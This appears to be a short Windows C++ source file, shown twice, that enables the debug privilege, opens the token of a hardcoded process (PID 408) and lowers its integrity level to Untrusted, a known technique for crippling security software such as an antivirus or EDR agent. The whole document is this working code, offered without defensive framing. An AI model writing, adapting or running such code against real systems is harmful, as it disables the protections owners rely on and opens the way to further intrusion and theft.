puppis42/ChangeProcessPriv.cpp

## ChangeProcessPriv.cpp
#include <Windows.h>

bool EnableDebugPrivilege()
{
    HANDLE hToken;
    LUID sedebugnameValue;
    TOKEN_PRIVILEGES tkp;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
    {
        return FALSE;
    }
    if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue))
    {
        CloseHandle(hToken);
        return false;
    }
    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Luid = sedebugnameValue;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL))
    {
        CloseHandle(hToken);
        return false;
    }
    return true;
}

int main()
{
    EnableDebugPrivilege();

    HANDLE phandle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, 408); //PID: 408
    if (phandle != INVALID_HANDLE_VALUE) {
        HANDLE ptoken;
        BOOL token = OpenProcessToken(phandle, TOKEN_ALL_ACCESS, &ptoken);

        if (token) {
            DWORD integrityLevel = SECURITY_MANDATORY_UNTRUSTED_RID;

            SID integrityLevelSid{};
            integrityLevelSid.Revision = SID_REVISION;
            integrityLevelSid.SubAuthorityCount = 1;
            integrityLevelSid.IdentifierAuthority.Value[5] = 16;
            integrityLevelSid.SubAuthority[0] = integrityLevel;

            TOKEN_MANDATORY_LABEL tokenIntegrityLevel = {};
            tokenIntegrityLevel.Label.Attributes = SE_GROUP_INTEGRITY;
            tokenIntegrityLevel.Label.Sid = &integrityLevelSid;

            if (!SetTokenInformation(
                ptoken,
                TokenIntegrityLevel,
                &tokenIntegrityLevel,
                sizeof(TOKEN_MANDATORY_LABEL) + GetLengthSid(&integrityLevelSid)))
            {
                printf("SetTokenInformation failed\n");
            }
            else {

                printf("[*] Token Integrity set to Untrusted\n");
            }

            CloseHandle(ptoken);
        }
        CloseHandle(phandle);
    }
}
	#include <Windows.h>

	bool EnableDebugPrivilege()
	{
	HANDLE hToken;
	LUID sedebugnameValue;
	TOKEN_PRIVILEGES tkp;
	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES \| TOKEN_QUERY, &hToken))
	{
	return FALSE;
	}
	if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue))
	{
	CloseHandle(hToken);
	return false;
	}
	tkp.PrivilegeCount = 1;
	tkp.Privileges[0].Luid = sedebugnameValue;
	tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
	if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL))
	{
	CloseHandle(hToken);
	return false;
	}
	return true;
	}

	int main()
	{
	EnableDebugPrivilege();

	HANDLE phandle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, 408); //PID: 408
	if (phandle != INVALID_HANDLE_VALUE) {
	HANDLE ptoken;
	BOOL token = OpenProcessToken(phandle, TOKEN_ALL_ACCESS, &ptoken);

	if (token) {
	DWORD integrityLevel = SECURITY_MANDATORY_UNTRUSTED_RID;

	SID integrityLevelSid{};
	integrityLevelSid.Revision = SID_REVISION;
	integrityLevelSid.SubAuthorityCount = 1;
	integrityLevelSid.IdentifierAuthority.Value[5] = 16;
	integrityLevelSid.SubAuthority[0] = integrityLevel;

	TOKEN_MANDATORY_LABEL tokenIntegrityLevel = {};
	tokenIntegrityLevel.Label.Attributes = SE_GROUP_INTEGRITY;
	tokenIntegrityLevel.Label.Sid = &integrityLevelSid;

	if (!SetTokenInformation(
	ptoken,
	TokenIntegrityLevel,
	&tokenIntegrityLevel,
	sizeof(TOKEN_MANDATORY_LABEL) + GetLengthSid(&integrityLevelSid)))
	{
	printf("SetTokenInformation failed\n");
	}
	else {

	printf("[*] Token Integrity set to Untrusted\n");
	}

	CloseHandle(ptoken);
	}
	CloseHandle(phandle);
	}
	}